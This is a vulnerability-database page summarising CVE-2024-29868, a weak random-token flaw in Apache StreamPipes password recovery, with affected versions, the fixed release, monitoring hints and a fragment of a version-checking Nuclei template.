CVE-2024-29868
published 2024-06-24CVE-2024-29868: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism…
PriorityP266critical9.1CVSS 3.1
AVNACLPRNUINSUCHIHAN
EXPLOIT
EPSS
6.00%
92.4th percentile
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.
This allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.
This issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.
Users are recommended to upgrade to version 0.95.0, which fixes the issue.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | streampipes | 0.69.0 – 0.93.0 | — |
| apache_software_foundation | apache_streampipes | 0.69.0 – 0.93.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Vulnerable versions of Apache StreamPipes span from 0.69.0 through 0.93.0; any deployment in this range is susceptible to weak PRNG token guessing attacks against user self-registration and password recovery endpoints. ↗
- →The attack vector targets the user self-registration and password recovery mechanism; monitor for abnormally high or rapid requests to password-reset/token-validation endpoints, which may indicate brute-force token guessing. ↗
- ·The fix is only present in version 0.95.0 and later; versions 0.69.0–0.93.0 are confirmed vulnerable. Version 0.94.0 is not explicitly listed as patched, so treat it as potentially vulnerable until confirmed otherwise. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation
ghsa·2024-06-24
CVE-2024-29868 [CRITICAL] CWE-338 Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation
Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.
This allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.
This issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.
Users are recommended to upgrade to version 0.95.0, which fixes the issue.
OSV
Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation
osv·2024-06-24
CVE-2024-29868 [CRITICAL] Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation
Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.
This allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.
This issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.
Users are recommended to upgrade to version 0.95.0, which fixes the issue.
No detection rules found.
Nuclei
Apache StreamPipes <= 0.93.0 - Use of Cryptographically Weak PRNG in Recovery Token Generation
nuclei·CVSS 9.1
CVE-2024-29868 [CRITICAL] Apache StreamPipes <= 0.93.0 - Use of Cryptographically Weak PRNG in Recovery Token Generation
Apache StreamPipes = 0.69.0') && compare_versions(version, '<= 0.93.0')"
condition: and
# digest: 490a004630440220285331b08fd85a845a07809bd60d5697c9707ddc9e3596fdfbb73a11df5e3be9022053de1458ebd3ec316986d4905321063ac8acc547279292a9dc33217eff886af6:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2024-06-24
Published